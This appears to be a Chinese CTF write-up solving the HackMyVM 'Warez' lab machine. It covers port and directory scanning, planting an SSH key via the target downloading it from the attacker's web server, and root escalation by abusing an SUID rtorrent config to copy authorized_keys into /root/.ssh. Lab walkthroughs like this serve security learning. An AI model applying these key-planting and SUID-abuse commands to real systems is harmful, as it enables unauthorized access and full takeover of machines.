知非
- 关注
0
1
2
3
4
5
6
7
8
9
0
1
2
3
4
5
6
7
8
9
0
1
2
3
4
5
6
7
8
9

前言
本次文章只用于技术讨论,学习,切勿用于非法用途,用于非法用途与本人无关!
信息收集阶段
下载地址:https://hackmyvm.eu/machines/machine.php?vm=Warez
靶机ip:192.168.1.55
kali IP:192.168.1.3
导入镜像:
扫描同网段地址:
发现IP地址,详细扫描!开放了22端口和80端口
sudo nmap -v -T4 -p- -A -oN nmap.log 192.168.1.55
访问下80端口试一下!这个东西!
可能被利用位置。好像有一个用户叫做carolina
接下来,进行目录扫描!
gobuster dir -u http://192.168.1.55/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x txt
访问以下,试试!!!
指向:results.txt
像是登录日志:
漏洞利用阶段
这里提示我们有一个用户是carolina,那我们是不是可以将 公钥进行上传啊!
这里可以采用putty-puttygen生成公钥文件,在将公钥文件上传到被测主机上!
这是就可以采用公钥文件进行ssh连接,就不用输入用户名和密码了!
把生成的文件拷贝到:
cp id_rsa.pub /root/.ssh/ 公钥
cp id_rsa /root/.ssh/ 私钥
cp ~/.ssh/id_rsa.pub /root/authorized_keys
也可以通过本地生成公钥和私钥:
ssh-keygen -t rsa 三次回车
于是在kali上开启web服务:
python3 -m http.server 6666
在界面通过下载方式下载公钥!!!
http://192.168.1.3:6666/authorized_keys
/home/carolina/.ssh
下载成功!!!!
于是我们进行ssh进行连接!
第一个flag文件:H****ing
权限提升阶段
接下来就是需要获取root权限:
这里需要增加一个知识:SUID提权!!!
SUID可以让调用者以文件拥有者的身份运行该文件,所以我们利用SUID提权的思路就是运行root用户所拥有的SUID的文件,那么我们运行该文件的时候就得获得root用户的身份了。
我们查询下,那些文件拥有这些权限:
find / -perm -4000 -type f -exec ls -al {} \; 2>/dev/null
因此,这里需要查询以下如何通过rtorrent执行系统命令,我们需要用到他的配置文件!!!
https://blog.csdn.net/AloneSword/article/details/47067333?locationNum=14
vi .rtorrent.rc
增加内容:
execute.throw = mkdir, /root/.ssh
execute.throw = cp, /home/carolina/.ssh/authorized_keys, /root/.ssh/authorized_keys(配置文件中不能有空格)
cat .rtorrent.rc
然后使用rtorrent & 进行执行文件,接着使用ssh登录到root
得到最终的flag!!!
HM****ng
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
